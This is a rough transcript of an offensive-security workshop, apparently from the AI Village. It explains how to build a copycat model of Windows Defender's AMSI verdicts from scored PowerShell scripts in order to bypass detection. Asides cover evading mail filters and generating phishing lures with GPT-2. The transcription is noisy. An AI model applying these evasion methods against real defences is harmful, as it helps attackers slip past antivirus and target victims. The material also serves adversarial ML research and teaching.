 Done. Okay, is that better? Yes. Nice. That's good. Nailed it. Thank you for hanging in there. Okay, so I want to ask what isn't machine learning. So as math underpins everything we do, they're kind of, I think you get to a point where everything is machine learning. So, you know, if you think about when you're a child and you're trying to learn to walk, it doesn't look that unfamiliar to, you know, when someone has reinforcement learning algorithms that are teaching something to walk. So from an offensive standpoint, I think it's an important distinction because, you know, where offensive folks try to live in the realm of possibility rather than in a sort of a box that we try to define. So, you know, maybe if you start thinking of everything as machine learning, you're going to find more opportunities to attack machine learning models, use them in your ops, whatever that might be. But for this attack, in particular, you know, we're going to, we're going to do a copycat model. And I think this, this kind of concept will come out as we go through it. So I'm kind of tired of the main copycat models. So I'm just going to call in pink panther attacks from now on. One, it's more fun to it's still kind of catlike. And three, I know pink panther involves a diamond that is always trying to be stolen and preconditions for a successful attack. And these are pretty loose are a representative data set. So for example, in the case of an AMSI provider, we're looking for like PowerShell, VBA code, a big representative data set that we want to model. And we need the ability to get feedback from our target model. And this doesn't have to be direct output. So if you imagine that a model doesn't give you, you know, back a score, but it keeps it in a Windows event log, you know, you still get your hard label, hard label being a zero or a one. So even if the model doesn't give you back output, there are still, you know, just do the telemetry nature of our networks. It's more likely than not that somewhere outputs being recorded. So rather than, you know, maybe going directly at the model, try and think of some binary test that you can, you can perform. That is potentially outside of a realm of a machine learning model. So it's pretty simple attack once you kind of get into it. Effectively, you know, you grab a massive, in this case, we found a big PowerShell corpus. So we is like 400,000 scripts and the workshop, the lab piece of it, we'll talk about that. Effectively, you know, the scripts get fed into an AMSI integration. And this just came off of the Windows sample. So all it does is, you know, load AMSI.dll and Sanctiate.com object. And we feed it every script in that corpus. And that gets passed to Defender or whatever AMSI provider that might be. And it comes back with a score. And then we turn on, we just collect those scores offline. And once we have, you know, we have known inputs and we know what the output the founder thinks of the output, we can, you know, model our model. And the hardest part about the hardest part about, I think, adversarial machine learning isn't the machine learning piece. You know, most of us don't have to invent math. People, you know, much smarter than myself have already done that for me. But what is difficult is the engineering piece that's getting access to the right data. It's getting it's getting data in a way that isn't going to get you caught or you're going to distribute your traffic accordingly. And you can kind of fly under the radar in the future. You know, currently attackers kind of have free reign and, you know, get away with quite a lot of querying and noise in the network. That's not always going to be the case. And I think it, you know, is helpful for us to start thinking about limiting our queries, thinking about information density of a command, you know, a PEN versus a process list, for example. You know, PEN, you're going to get, well, if a host is up or not, or you're going to get TTL, which is going to tell the OS. But a process list, you're going to get, you know, that and more. But it probably just spends on what you're after. And, you know, from a machine learning perspective, an offensive perspective, like anything can be modeled. So if defenders are using machine learning to model, you know, whatever logs they're looking for, there's nothing to say that we as offensive folks can't also use machine learning to say, model C2 traffic, or let's say you have semantic, you have some product that is blocking you, and you can't quite pinpoint it. Machine learning will be able to do that for you if you can set up the right experiment. So even though, you know, semantic is not using machine learning necessarily to look for C2, your C2 traffic, you can still use it to, you know, find those relationships between, you know, whatever domain or whatever callback interval that you're using against whatever product it might be. So I guess I just come back to the question like, what isn't machine learning? And in my mind, everything is machine learning if you kind of go back to the math, which is kind of fun. Okay, so in the lab for the workshop, all the code is in there for you. So the first half you'll step through, and it'll be, you know, very explanatory. And then as we go through, you know, it'll be less and less explanation, so you'll be required to kind of look more asked, ask more questions, etc., etc. Break stuff like you're not going to break it, you can always reset it, Google it, ask us for help. AI Village has easily, probably the highest concentration of some of the smartest people in the industry. And there's so many PhDs and super experienced people. So, you know, we love talking, I like talking offensive ops, but, you know, a lot of people like talking stats and topology and homology and all this other stuff. You know, the other day I learned that there is more than one algebra. But yeah, so, you know, this is the place to ask, so go ask for it. As you go through, I would challenge those of you who are more experienced to produce a better and more efficient attack. And in there, there is also a massive data set of VBA code that I found. It's like nine gigs of VBA code. So if you want to go through this code would work the same and you could get your name on that leaderboard for CVs for machine learning systems. So if you want to do that, you can go for it. So feel free to ask questions discord, there is there are no dumb questions. And, you know, we have three TAs that are helping me out here. So if you have, you know, specific questions, we can ask for it. So hopefully you have the the link. You have everything. So effectively, this is the you call this is the work workshop. And there are two, two files to Python notebooks, one's the solutions and one is the workbook. And you should start with the workbook. If you do get stuck or you need code help, or you just want to grab it and go, the solutions ones gonna work for you. This amsy.h file is if you do want to compile the amsy stream.exe so you can recreate the full attack path. You're gonna need this header file. The collect.py is what we use to gather all the information. And then this insights.xlsx, this Excel file. This is the version one of the insights that we pulled out of Defender. So this would be like that that proof point style insight. And, you know, it is our version ones. This is it. So obviously, you can see, you know, there's a lot of binary blobs in here. But these would be the most malicious tokens. And this makes sense to me. Code command. And at the bottom, you have the least you have a giant binary blob. And at the bottom, you have the least, you know, malicious commands, or I shouldn't say commands, most least malicious tokens. Yeah. So this that's free. And yeah, so you guys can get started. Do you have any questions right away? I haven't seen any questions so far. Perfect. That's good. That's good. Is anyone is getting 403? Is anyone else getting 403? You're not seeing any chat on Twitch or Discord. It's just reopened the link. And it's building the container for me. Okay. Yeah, me too. Okay, that's good. I am in the the Jupyter Notebook. Nice. Yeah, so the first little bit, just I'm gonna give you guys like 10, 15 minutes to rip through the first little bit. And if you guys have questions, remote is always a bit weird. You know, it always gets me in the mood. Can you guys hear that? What always gets you in the mood? Tron. Yeah, I don't think it's a good idea to stream copyrighted music on here. Oh, right. Twitch doesn't really have a problem with that. But the YouTube part at the end will be removed. That's fair. Yeah, don't spend that much time on the internet. So So, well, I can send you the notebook link again, or myself and other people are using on the chat. That's good. I have. Excellent. Okay, so yes, I'm just going to talk. Everything's pretty self explanatory. In terms of the instructions. So we need to zoom in a little bit. It's kind of hard to see on the street. It's a better There's a one year old. I can see it very clearly. Excellent. So I'm just going to talk to you guys for free to run through. So sort of the basis of this attack is really the Annie scan and Mallor scan interface. Amzi is something they introduced in I want to say PowerShell five little sooner than that. But effectively, it's just a DLL that gets called into PowerShell, the IC dialogues, any J script, Phoebe script, and now dot net 4.8 and beyond. And inside, it has a number of blacklisted functions that whenever one of those functions is called, Amzi will get called to scan content. And Amzi is not a it's not a security boundary. It's not a security product. It's it's an interface. And so all it does is collect output, or so I collect whatever content is being put into the buffer or the string, and it passes it back to an Amzi provider. And the Amzi provider then has an opportunity to scan the content and make some determination. So obviously, this workshop is about Windows Defender. But there are several other there are several other providers, Amzi providers that this attack would work against. And that's, I suppose, kind of the nice part about machine learning currently is there's a lot of attack surface. So once an Amzi provider, you know, scans the content, and it decides what it is, there's, you know, a range of scores it can give currently, it only gives back zero or 132768. But in Microsoft documentation, they talk about a range of scores. So if you think, rather than a hard label as a zero or one, eventually you'd get some sort of regression type continuous variable continuous. Yeah, continuous variable on the out. And so you'd get, you know, some heuristic, I suppose. There is a great talk by actually Microsoft, badly behaving scripts. It's probably like an hour, an hour long. But I think they gave it two years ago at Blue Hat, I L. And it's two engineers from the machine learning team. And they're just discussing kind of how Amzi works, the things that they're looking for, the things that they are kind of the kind of models that they're building and so on. And so this is kind of our first indication, at least officially that, you know, machine learning was being pushed onto the client. And I think it would seem anyway that overtly malicious things get stopped on the client. But anything that's kind of in between seems to take, you know, seems to go to the cloud. One way to test this would be to have some sort of timing attack, you could get the response times for submission to the reception of a score. And you could maybe see if there was a significant difference between, you know, the worst scripts and then the medium bad scripts. So we've none. You guys can obviously read. So the first thing I've seen you do to create a copycat is we needed a data set. And there's a talk by Lee Holmes and Daniel Bohannon in 2017, called revoke obfuscation, power show obfuscation detection using science. And in the day, basically so Daniel Bohannon wrote invoke obfuscation, which basically takes a script or, you know, any number of different languages. And it puts it through obfuscation. So you know, it breaks it up into million different pieces. So it'll break those rejects is that, you know, those brittle detections. It's awesome, awesome tool. These guys wrote it, wrote the talk and part of that research they collected like two gigs worth of PowerShell scripts. And they labeled them both benign and malicious for us. And so they're already, you know, you can actually the links here. So you can go pull it down and rip through it. Once you have that, you know, the rest of it is just getting target outputs from the target models. So, you know, if we want to create a copycat, we want to know what defender thinks of each script that we give it. And then, you know, that is we model the model. So we have the inputs and we have the outputs. We don't know what's in the middle. We don't know that black box. But, you know, we can infer it, you know, through with our own model. And you'll never get 100% of the model. But you might, you know, get just enough to, you know, bypass Windows Defender, you know, for a month or just one time or whatever it might be. But the nice part about machine learning and the struggle that machine learning has, I think is, is it does introduce a probability into what used to be a static decision. Yeah, the larger positive thing interesting is VBA. So that's just nine gigs of Excel macros that you could do the same with. Which would be pretty awesome. We have, let's see, what is this? This is the, this is the game, you're not on Windows. If this were like a lab lab, we'd have like Windows VMs, and we do this like for real. The this is just the output from the AMSI stream. So invoke WMI backdoor looks malicious, but Defender doesn't think it's malicious. So if you look down, you see scan result is one is malware zero is malware is the is the official feedback loop. And, you know, even in that in that talk that is above, they discuss the fact that you can't trust file names. And that makes sense. You can't trust headers anymore. There's some research that did a number of like three years ago now, against mail filters where you would null out the first two bytes of a duck and file. And depending on how the mail filter decided what kind of file it was, it would either, you know, block it or it let it through because it can't read the magic bytes at the top. And then obviously the documents corrupt at that point. But what Windows does is when you open the duck and file as it would ask you to repair it. And if you, you know, if these are clicked, yes, I'd like to repair this document. You know, your macro would live. And you could get code execution. Right. But the next bit is the provider display name. So we have, you know, Microsoft Defender antivirus. If this is if defenders turned off for whatever reason, or there is no AMSI provider, it'll give you an error. And you will not get a score back. The next piece is just PowerView. So PowerView is pretty well in the script. And it is definitely, well, I it's not explicitly malicious. But it is used by malicious people. That's not fair to say. It's used by attackers. I'm sure there are some nice attackers. So in this lab, there are uploading 380,000 scripts to GitHub was not popular with GitHub. So in this little bit, you only have 3000. But the collect up UI has everything you need. And when we were parsing, you know, we just did in your data, you have data clean and dirty. These should be your malicious scripts. And clean scripts are see clean. There's like 3000. There are about 1200 malicious scripts. They can look at. Yeah, if you guys want to start ripping through this code. As we're parsing, you look through collect dot py. But I personally like to keep. So there's a lot of moving parts, machine learning, you just you kind of can't get away from it. So whenever possible, I kind of like to keep at each step, you know, build a data structure and I'll keep the previous output. And I think it works. I see most of my data sets are pretty small anyway. So it's manageable. But you can kind of see the get screenshot. So this is the file name, the original file name. This is the hash, the empty five hash of it. This many of the result being its malware. And you have the basic C4 encoded text that you can go through. I like this because if there's any weirdness, you have everything you need right in front of you, you don't have to go, you don't have to start again at a particular point, you don't have to go back to the beginning of the process. You know, being able to debug all the way through your pipeline is, you know, it might cost you some speed. But at least for me, it's fine. I'm not dealing with billions of things. So yeah, we just got discussed lists. So if you're not familiar with a list, to think probably most of you are raise your hand if you're familiar with lists. Nice. Okay, it's about 20% of you. Can't hear any giggling. All right, so you have lists, lists are like really nice. So you can just split them on any dilemma you want. But you guys, I'm interested in the lists. So quickly, quick question, Will. This is from the Twitch chat. Should he be able to view the PowerShell code? When they click on a file with clean order to get a mess of characters, but not a script? Yes. So do you? So if you Yeah, so in this in this little code block here, you can open it and it is it is just a so we've already parsed it for you. It was just gonna take forever otherwise. So what you're gonna see is the script name. So this is the original script name, the MD5 hash of the script content. The AMSI result or should I should say the defender result. So what defender thinks of the script? And then the base 64 encoded version of the script. So and can you turn lines? So this bit, yeah, that's what we're doing here. So we're splitting, you know, a file. So what we're doing is we're setting up eventually, we're going to rip through all these, these files, and we're going to build a big vocab. So this is a, this is I just pulled one out as an example. So let's see. So for example, if we want to reference, you know, this is just less stuff. So obviously, index so we can reference it however we want. You can then reference with semi colon, you know, from index one to the end or from index one to the third and you know, third. Or you can even do minus so you can go to the end of the list. And just get the script content. But if we're going to look at the script content, you know, we kind of want to know it's interesting that get screenshot is as counted as malicious. So if we decode it, we can have a look and maybe maybe there's some knowledge that we have that we can think about as to why it might be malicious. So we're just using split to make it a little nicer. And there's a typo right there. It's a double typo now. So to make it nice, actually, this isn't the solutions one. So you guys would know this. So if you want to make it like a little nicer, we're just going to split it again. And we're going to get like a list of the things. So this list, in my mind, the some of the more malicious things would be the add type assembly. It would be convert to in 32 new objects just to my own memory stream. So everything like in memory attacks, any sort of memory streams. And then at the bottom, you also have to base 64 string. You know, I think base 64 is typically something that gets picked up quite easily. But if you wanted to figure out, you know, how this was, why this was malicious or why defender thought this was malicious, does anybody have any ideas that they want to type out to anybody typing can't see. Yeah, it doesn't seem like there is anybody typing on discord right now. Nice. Yeah, so we're just going to go through the dictionary. So and you know, this is just what I came up with. It would be to try and determine the commonality but, you know, between all the malicious scripts and see if see what tokens and when I say tokens, I mean words, words came to the top. And to do this, we're going to use we're just going to do a dictionary. And it's kept, you know, key, key value pair. So I'll let you guys run through that. And if you need playground dictionaries, they're pretty awesome. Like dictionaries. But there is one other data structure that I like even more than dictionaries. Excellent. So we know what dictionaries are now. And we're just going to decode the content. And we're going to add it all to a dictionary. We're only going to do one script. And does anybody know why we might just only want to do one for now? Because it's a good practice. Good practice. But when you are dealing with, I don't know, thousands of scripts, like half a million scripts, if you have something that's going to mess up halfway through, or you start down that path, that you're just going to waste a lot of time fixing errors. So if you can get to work with one and then 10, and then 50, and then 1000, you know, I think that's a much better way to go about processing large data, large datasets. So for this one, we're just going to do one. But we're going to split it twice. And then we're going to just add everything to the word index. So there's a fill in your blank, a fill in the blank bit here. So if you guys want to go ahead and run that code, and then tell me what the issue is. And I'll give you clues. It's on the line with all the question marks. I didn't know that I needed to be as close to the microphone. Or are you guys already way, way, way past this. So to get a proper count of the words as we go through them, we need to just add one. And you would have been able to tell after you went through it, because there's only one token listed for each. But the script has at least one so if we just fix that. Now we get a better representation of what's out there. Going one at a time. I guess I found, you know, I used to have a real issue with loops where I wouldn't break them out properly. And so doing it a little more slowly, at least one time has helped me. And then we're just going to sort the dictionary by token. So now, you know, this equals sign. There's nine of them. There's six curly brackets. There's four new objects. But nothing. So there is a lot of punctuation in there. And but we can deal with that later. So now, because we're impatient, and we just want to get to the machine, but we're going to run through the entire all of the malicious scripts. And it might take a little bit on the binder might even take a little bit here. The yeah, I wish I tried to ship all of the scripts to you. Okay, so now we're just going to sort the words. This is all of the tokens for all of the malicious scripts. And it isn't ideal. So there's a lot of numbers. And this is fairly common when you're tokenizing text. And I would generally just say Google slow but nice bit is we're seeing get proc address. Does anybody know, you know, in what operation get proc address might be used? Does anybody that works in an AV vendor know what get proc address might be used for? You can Google it if you want. Nobody GT, any penetration testers, malware authors, anybody? I'm a data scientist. That's fair. Well, I'll let you look that up. But it's it's used typically when you're looking up front functions in remote in other DLLs. Most notably, I think used in process injection. Anyway, alright, so there's a lot of numbers. It's fairly classic. But you know, we're seeing write bytes to memory, memory address, a lot of malware type things, remote proc handle, obviously, this is all PowerShell. But the numbers are actually kind of annoying. So let's scroll through. I mean, I'm, are there any tokens in there that are particularly interesting to anybody? Okay, Rob, logistic aggression managed to answer a question. Thanks, Rob. I was the man. Switch chat. Nice. What was it? He said you get the address of a DLL function and memory also heavily used in packers. Yeah, exactly. No, I can count on Rob. Okay, so the next bit. So we're just going to continue to filter down. And I would say that's, that's generally the case with most of your data, I think most of your time spent when you're doing machine learning isn't actually machine isn't the bit isn't the math piece that you typically think of it's processing data, it's, yeah, it's processing data, it's filtering data, it's making sure that your data sets are balanced or have a distribution that you want or whatever it might be. You know, I said earlier that we're not inventing new math, like I'm not going to, I'm not going to be the guy to invent new math. So, you know, I, the place that I can be most effective is using applying my domain knowledge to, you know, what I know of machine learning and being extra careful with my data. There's a Abraham Lincoln has a saying about sharpening an axe. Can't remember exactly what it is. Yeah, it's going to cut down tree, I've had 10 hours to cut down a tree, I would spend the first eight sharpening my axe. That sounds right, I could have made that up. But the same is true for, you know, machine learning, and I would say data science. And I don't have comath, do you want to chime in there as, as a data scientist, if it's true or not? Yeah, I tend to get the fly something that works, and then to go back and perfect it to make sure I don't get little mistakes. Because when you scale things up, it really screws you when there's a bug one point point one set of time. Now you have 100,000 things, the bug was his guaranteed to happen. It's better to clean this up before you really Yeah. And if I mean, if you're, if you're a data scientist, like, if in the Twitch chat, you don't try it, what do you think the percentage of cleaning versus actual machine learning, like data processing versus machine learning, I think that would be interesting. And if you're new to machine learning, I would say it's okay. I mean, yeah, no, it's okay to be impatient and like go really fast because you want to get the end result. But if you want to get quality results, it is better to go a little slower. Okay, so we're just going to create a new list. And the difference here is we're creating just a find all. So we're going to start removing some punctuation and numbers. And then we're just going to add it to a new list. And then we're going to print the top 100 tokens. So all the numbers are gone, a lot of the punctuation is gone. I tell that looks quite a bit better than the other one. We can still see we still have get proc address, we still have you know, so we're still seeing the malicious tokens that we would expect shell code. And so we haven't, you know, completely ruined our our I want to call them crispy bits. But we haven't ruined our what we want to model effectively, right by its memory. So that's also there. So this bit I am, I just had picked some tokens and go Google them and make sure that you know, there. See what comes up. That's kind of fun. But I suppose we are live, I can do that. Let's see. You guys are using edge that that's embarrassing. Do you guys have you guys heard mini cats? Do you know if that one's malicious? Yeah, I would say so. Power shell type. It's just like this malicious yeah. Yeah, yeah, definitely. And I would say as an operator, I think a lot of the industry uses a lot of the same scripts. So if like the deal injection, the deal injection at graver. Yeah, so these these are these are malicious text scripts. Okay, so once once we have that bit, you know, you could we could stop here, right? So we have some malicious tokens that we know that, you know, these are all tokens or words that were labeled as defend by defender as malicious. So we could stop here, theoretically, and have malicious scripts that never, you know, don't use any of these words. Alternatively, you could do the same with the clean scripts and only use, you know, words from those clean scripts, or, you know, you could do both. But I think that would probably work. But I think you would have a hard time making it repeatable. And you wouldn't necessarily, you know, something if it all of a sudden stopped working, I don't think you would have much recourse and being able to figure out how or why. And so I think this is kind of where machine learning shines for us. And it's just the ability to iterate through massive amounts of data extremely quickly. So you know, while I'm going to use the the GPT to fishing analogy, and it's like, you can spend an hour crafting, you know, one fish for five targets, or you could spend an hour correcting five unique fish generated GP to GPT to for five targets. GP to G language models aren't perfect. But they do help scale. So it's like you generate five of them, and you can correct them, make them seem, you know, realistic and not sound terrible. In the same time, you could to do one. So, you know, in terms of pulling out insights from Windows Defender, I think this is also true. All right. So we're getting to that's the machine learning bit. And in this manual, you know, we reference 380,000 scripts. There are I think 410 in the whole piece. So in that PowerShell link at the top, you know, has that many. We just use I just chose the biggest folder that had them in there. And then introduce them to insight. So we're going to get into some of the data representation. I think data representation is probably my favorite part of machine learning. It's really where you get to shape kind of shape the output and shape not the model, because the model has some architecture, but you get to encode and embed your domain knowledge. When you, you know, I guess it'd be called, it's been coming from wrong, but you'd call it feature engineering. And that piece is is extremely important. So, you know, if you want to the outputs of your model, or the accuracy of your model is a direct representation correlation with the quality of your data representation and your feature engineering. And it's, yeah, it's my favorite part. Okay, so GT went through tokenization earlier this earlier today. But tote we've already kind of played with tokenization, but tokenization is effectively the process of splitting, you know, the the words into separate words. So, you know, each, each losing it, nine to separate words, you piece out sentences into a list. So once we have a tokenizer, rather than we could write it ourselves, but like we did up here, but I would imagine there's probably better developers out there. And I trust I trust them probably more than just no code for some stuff. But if you imagine this corpus, so if you imagine this corpus is actually just our big PowerShell list. So each line is a PowerShell script. You know, just a list of it. And we're going to fit on text. And this is just to create an index. So we're just creating those data structures. And you can see, you know, each each word gets its own sequence integer. And, you know, in terms of sequential numbers, like in a text prediction scenario, like sequences are really nice. Because you can say, you know, what number comes after what, and you can go back to your index and look it up. Yeah, so if you're gonna go my cat likes mittens. These are I don't have a cat, but I assume cats like mittens, or most cats are cold mittens. But we're just taking the first index and we're tokenizing it. Six more cats. It's, it's yeah, it's a word index. It's fairly straightforward. And there are a number of ways to represent text. You have machine learning models, that'll do it. You have frequency models, you have TF IDF, which is term frequency inverse document frequency, which is like a weighted frequency. What else do you have? What am I missing? Obviously one hot encoding, that's where we're gonna go next. So one hot encoding is basically it's a vector, which is the length of your vocabulary. And the presence of a token or a word is denoted by a one. And if it doesn't exist in a document, then it's a zero. And so we end up getting is, let's see how long is there? Well, it's only 17. So each vector is going to be 17 integers long. And the array is going to look like this. So this is just the first sentence. As we go through, you know, you'll see, as the words change, you get different, what do you call this? It's not indications, activations, probably incorrect. You get different, yeah, indications. Anyway, hopefully that makes a little bit of sense. And see, the nice part of one hot encoding is that you, I guess, take you, you do get every token in ones that are well represented, they, you do get some sparsities. So if you have a lot of like a really big corp, you know, really big corpus or vocabulary, you get some sparsity in there. But it's really nice if you only care about the presence of a word, it does not. It doesn't necessarily keep the semantics or the syntax or, you know, it's not very good for text prediction. It is good for classification. Just kind of what we want to do. Alright, so now we kind of have an idea what tokenization does and the tokenization scheme that we're going to use, we're going to get into my favorite data structure, which is named tuples, named tuples are immutable, well, they're, they're tuples, but you can, they're like immutable classes. So you can kind of create them, you can set your, your variables to whatever you want. And it's really nice because then you can turn around and reference a tuple or reference a variable inside of a tuple by name, which makes your code read a lot cleaner than if you were just going to use a tuple or a list or even a dictionary dictionaries can be. Actually, I don't know the speed difference between dictionaries and the tuples. Does anybody know there's any? Maybe not. But this is an example of named tuple. I, you know, it's like, you know, when you find something you like, and you use them absolutely everywhere, that this is where I'm at with named tuples. Just because they're super nice. So this code, we are going to kind of create our training structure. So this is you should be familiar with everything in this code block by now. So we are, we have our filter, you know, there, the tokenizer has a filter attached to it. If you want to use that one, we're going to create a primalist to hold all of our training data. And then we're going to hold a we're going to create a list that will that we're going to use for tokenizing. And this is kind of eventually, you know, when when you start building these small pieces, eventually, there's a point where they kind of all come together. And you can transition from processing into learning. And this script here is where we do that. So, you know, all of a sudden, we can, I shouldn't say script, but so we've built all these tiny pieces out. And you can kind of see how that they're coming together. And there's, there's two really important things happening in this little code block. Obviously, the tokenization is happening. And we are collecting all of the all of the name tuples. So I know name tuples, we're going to go through every malicious script. We're going to decode it as we did before, we're going to remove all the punctuation, we're going to split it, we're going to unique it. I did this because I assume it makes tokenization faster. But I don't, as I said, I don't have any evidence for that just seemed to make sense. Maybe you guys can try and let me know. We are going to then, you know, rejoin the unique tokens, unique words and sentence, and we're just going to add them to a name tuple, and then add that name tuple to a list. So the important piece here is the label. And, you know, from malware, the label is a one. And then for clean labels are zero. So this is where we're kind of creating our training structure. The other piece you might notice is originally we had 380,000 scripts that we ran this on for this demonstration, this workshop that get helped and really like it. So we only gave you 3000. But now that's still like a two to one. But when you're having 380,000 scripts versus almost 1200 scripts, you know, your data is very unbalanced. So if you, for example, were to do a similar scheme as we did earlier with just the malicious scripts, we did it for both. What might end up happening is your clean script words will start to the word isn't drawn out. What's the word Eric spin? What's the technical term? I'm gonna say drown out or average out whatever it might be. It's like if your GPA is really bad. Eventually, you just can't get it out. Alright, so then at the end of this, so the outcome of this is we're gonna get a list that has all of our name tuples that are ready for to be processed to be fed into a model. And then we're gonna have all of our documents that are going to be tokens. So at the end of this, we're just going to build a vocab and we're never everything. This is a little blurb. So it takes a little bit to go through all of them. Because I open this, I don't want to tokenize that. Also, you guys probably know this, but if you guys use them, it creates a swap file. So I helped some help divide some issues with where they were, they were opening their data files inside of a folder and running Python out of the same folder. And so their Python was like trying to tokenize their text and they couldn't figure out the error and it was just because they were trying to read a swap file. Anyway, all right, so now we have our our vocab. Yep. And we can kind of see the tokens that came out. So these are the after our filtering, you know, the closer you get to training, you want to be, you know, you want to be increasingly happy with what you're seeing in terms of the words or the tokens. And I think that I'm more happy with this than when we started being definitely play by ear, but it is useful to take a moment and see. Just take a look. You know, remote DLL handle, just take a look. That's gonna be useful. Let's try them. So this is something I haven't dealt with. And you can see in the insights.xls, but if you were going to deal with it, this is probably how you would do it. So you just want to do a regex for this TVQQAAMA. Does anybody know what that is? I bet Rob does. I see you're binging it. Yeah. Yeah, this is the this is embarrassing. The best way to Google. Yeah, so that's, you'd want to remove those obviously. I didn't. It indicates that it is a PE file. Yeah. Yeah, compressed or embedded in some other medium. Okay, so now we're at the point where we are, I already described this, but if you're not familiar with machine learning at all whatsoever, there's a little video series by, what's his name? I don't know. But his YouTube channel is 3Blue1Brown. It's just like four videos an hour. It's really good. It's gonna be way better than I will ever be able to explain machine learning to you. So I recommend having a look through that. You know, watch it a couple times. And if you're really into math, he has a lot of cool stuff like, yeah, his animations are really good. But neural networks, we've kind of all seen this picture. But our input layers represent our input data or our one-hot encoded text. Hidden layers represent an activation function. And the output layer or notice the result of the network or classification, prediction, whatever it might be. There are a lot of, machine learning is more than this little picture that we see everywhere. And I would say this is like the tiniest little bit of machine learning. Even inside of this picture of the mechanics that are going on, you know, are quite extensive. And this is just like the most vanilla machine learning implementation. So I think the nice part, you know, the nice part about Keras and whatever the frameworks is they bring, you know, that kind of ability and power to non-mathematicians or non... What do you call non-mathematicians, spin? I don't. Is there an industry word for them? You know, like, I'm trying to be like, hey, what? Students. Students. Yeah, something like that. Normies. Normies. Yeah. Honestly, we just don't think about non... Yeah. I don't want to dig myself into a whole year. You've got too much math to think about. As a non-mathematician, I take credit for this. Yeah. Yeah. So I think people was right. Yeah, I just got it right. Late people. Yeah, late people. And if you are, I think the first book I read was Make Your Own Neural Network by Tariq Rashid. And that was, it was just the most, it was like 120 pages. It was just the most basic, most straightforward explanation of a neural network. You know, I think there's, there's a bajillion tutorials out there, and I think they are okay, but you know, they always, they're always so quick to get into a framework without actually explaining what's going on underneath. And that is definitely a hindrance. Like, you don't have to be a mathematician to use machine learning, but you should at least spend time learning the basics. Okay. So, let's see. Do you have a little explanation of machine learning? We have our train set. We're happy with the tokenization to a point. I'm happy enough for now anyway. You know, eventually, you know, I think you always want to be moving forward so you always kind of want to be thinking in pipelines. So I wouldn't, you know, wouldn't spend too much time necessarily in one area, but when you build it, make it such that it is modular and can be like put into it into a, into pipeline. Let's see. So now we need to tokenize all the documents. And this will take a list, which I think docs is. We'll find out. Nice. And then we can, let's just double check. And now we're going to create our, our score array. So here we have, so this is a named tuple that we're going to go through. So we're referencing e, which is a terrible variable name, sorry. But all text is the, where the list is holding all of our named tuples. And if this is a, this is called list comprehension. Another, another favorite of mine, it's like creates a list. Put a function inside of square brackets and it'll create you a list. But you can see we're referencing the label. So we're just going to create a score matrix and actually you can see what that looks like. But there's giant arrays. And the reason they're giant arrays is because mechanics of machine learning is kind of, would you say rooted in matrix multiplication? No, because that will ignore all of the decision trees and a bunch of other things. Yeah. Yeah. And canyons, they bruise in a bunch. Yeah. Yeah. Yeah, this, so we, when I was talking about like the, this picture being kind of done, it's the only picture we ever see. And it's like the smallest, it's just one of the smallest pieces. There's so much more out there that you should look at and I probably could have introduced you to. Anyway, so now we have our score matrix. Actually, I'm looking at this. Okay, so these are all our labels. So when the, when the network's learning, you know, it's going to calculate a loss. So it's going to have an input. And then at the end of that, it's going to take whatever the label was and see how close it was to the label. So a large loss is bad and a small loss is good. And through gradient descent and back propagation, the network will update the weights, you know, such that the next time it sees or, you know, there's something, you know, a label like that, it'll hopefully be closer. And we'll get into that. So I like this. This is part of my playlist. It's a tether of spaces, nano versus VS code, messy versus that other guy. Machine learning frameworks are no different. So do you guys have preferences for machine learning frameworks? Like what, like, why do you, why do you choose the machine learning framework you do? I use PyDorch because it tends to look more like real code than TensorFlow. But Keras is like super easy to get up and running. So it's a good choice. Yeah. And then when you do the real world stuff, I reach into a compiled language like Rust or C. Oh, see, that's brave. Has anybody used ml.net? Did anybody know ml.net existed? No. Depends on what you want to do. Actually, I have a win32. So directX. There's a win32 machine learning implementation. Actually, it's not in it. It's just an interface for TensorFlow on X models. Yeah, I prefer Keras. It's simple. I think if all the math is the same, then you're really just looking at what you prefer. And yeah, this is what I, yeah, Keras is good to get off the ground, but it may limit your customization. And I think that's exactly what an API, it doesn't limit you, it abstracts complexity. So I think the reason Keras is so easy to use, because it's a really good job of abstracting complexity. But if you want that complexity you want to dig in, it's still there for you. You just have to potentially dig a little deeper. Versus something like PyTorch, which is pretty raw, I would say. That's probably not true. I mean, some guy in the back's yelling about Matlab right now. Oh, Matlab? That's a whole other factor where we all have a little bit of PTSD about it. Yeah, don't ever say Matlab. Yeah, Rich is saying PyTorch is, yeah, Keras is good for 99% of your projects, and then PyTorch, where when you're getting freaky, and I say PyTorch is good for 90% of your projects, and Rust for when you're getting freaky. There's also Jax, all sorts of stuff. Oh yeah, Jax. Does anybody use Jax? Do they like it? I know Jason is seeing here. Yeah, it's kind of the Wild West, I would say. Like, yeah, there's a bajillion different frameworks. Everybody uses something different. I like TensorFlow. It has TensorFlow serving. It seems to have a good ecosystem around it. But you obviously, you make trade-offs, right? But if your verbiage and your fundamentals are good, then I think you could probably use just about any language with enough practice. Okay, so we're going to create our model now. And we're just going to create, you know, it's the same as the picture effectively, but we're just going to create it in code. One thing we didn't talk about are activation functions. Or actually, I didn't actually talk about a lot, but as inputs or as your data traverses from weights into hidden layers and hidden nodes, weights, as they change, their job is to modulate inputs based on, sorry, modulate, yeah, modulate inputs based on their inputs, such that the output is relative. Sorry, I saw some in the chat. So we're just going to use Sigmoid. I think Sigmoid is super simple. Just go place to start. The other, I don't know, what are some other favorites? I know Relu has replaced Sigmoid. Is there a good reason for this? Or is there, does everybody kind of go, Oh, this is better. So are you going to use it all the time now? So the Relu paper was originally basically said, Relu gets better accuracy scores than Sigmoid. And they just compared that across a bunch of things. And for images, it tends to, Relu tends to have a higher accuracy rate of score than Sigmoid does. And that's basically why at one is because on images, you can easily show that it's better. I don't know whether it's concretely better in all situations because of that. So you're showing your age with Sigmoid here. Relu also handles the disappearing differential, or disappearing gradient, yeah, vanishing gradient, where if you go too far into the negatives or too far into the positives, you're never going to crawl yourself back out. Yeah. And then there's leaky Relu that helps, that tries to help that even more. There's L who tries to say, Hey guys, you could be Relu, you could be leaky Relu, let's just combine the two. And so I think it never goes below negative one as a way. Yeah. Yeah. And I think this is actually like, I like the discussion. I don't know how many of you are listening or machine learning people to begin with. But as, and this is why the tutorials are kind of, they're nice to get off the ground, but I think they're limiting in the fact that they're always using kind of the same architectures. So they're never, you know, to say, Oh, this is good for this and this is good for this. And that's true. And you might end up there anyway, like they are, maybe there's just lessons they've learned that you haven't. But I think it is important to explore different architectures, different losses, just play with play with the numbers. I think machine learning is ultimately about iteration and experimentation at scale. And that includes activation functions that includes output nodes, includes any, any lever you can pull, you should pull it and see what happens. Also, the, as an engineer, sort of as a data scientist, you should learn pull the levers and see what happens. Because you might find that on like security data, 